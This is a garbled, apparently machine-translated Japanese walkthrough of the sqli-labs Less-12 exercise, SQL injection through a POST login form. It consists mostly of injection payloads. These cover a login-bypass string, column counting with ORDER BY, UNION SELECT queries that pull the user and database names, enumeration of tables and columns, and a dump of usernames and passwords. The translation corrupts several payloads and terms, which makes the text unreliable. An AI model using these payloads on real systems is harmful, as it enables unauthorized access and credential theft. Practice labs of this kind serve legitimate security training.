あまり-12 POST - エラーに基づく - 二重引用符 - 文字列 - ひねりを加えました
あまり-11レス-12は、単一引用符が直接演習げっぷスイート、少ない-11と整合ステップに少ない-12のために、二重引用符を括弧である点が異なります。
0x01の。オリジナルページ
ユーザー名とパスワードの2つのパラメータはのunameとpasswdました。げっぷは、パラメータのuname = XXX&passwdファイル= xxxの提出しました
0×02。噴射型の分析
uname = 1&passwdファイル= 1&提出=送信
は、uname = 1' &passwdファイル= 1&提出=送信
は、unameは1"が&passwdファイル= 1&提出=サブミット=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1与えられた文は見ることができる括弧注射で二重引用符
。注入点に0x03の分析
ユニバーサルパスワードの試行:
。は、uname = 1「)1またはpasswdの= = 1. 1&#=&Submitを提出する。。
0×04は、フィールドの数を決定します。
uname =管理者")ため3#による&passwdを= 1&提出=送信
は、unameが管理者を=" 2#順)&passwdの= 1&提出=送信
クエリは、フィールドの数が2で返されますが、表2のフィールドの数ではありません。
。0x05の取得ユーザーとデータベース名
。は、uname = 1 ")連合SELECTユーザー()、データベース() - 。+&passwdファイル= 1&提出=提出
0x06の取得すべてのテーブル名セキュリティデータベース。
は、uname = 1")組合1を選択し 、GROUP_CONCAT(TABLE_NAME )INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = 'セキュリティから ' #&passwdを= 1&提出=送信
0x07に。すべてのフィールド名のユーザーテーブルを取得
は、uname = 1「)連合SELECT。1、GROUP_CONCAT(COLUMN_NAME)TABLE_SCHEMA = [セキュリティ] information_schema.columnsとTABLE_NAME = 'ユーザー' #&passwdの=からから。1&提出= Submitを
0x08にする。すべてのフィールド値を取得します。
uname = 1「)組合1を選択し 、ユーザーの#から、GROUP_CONCAT(ユーザ名、0x3a、パスワード)&passwdファイル= 1&提出=送信
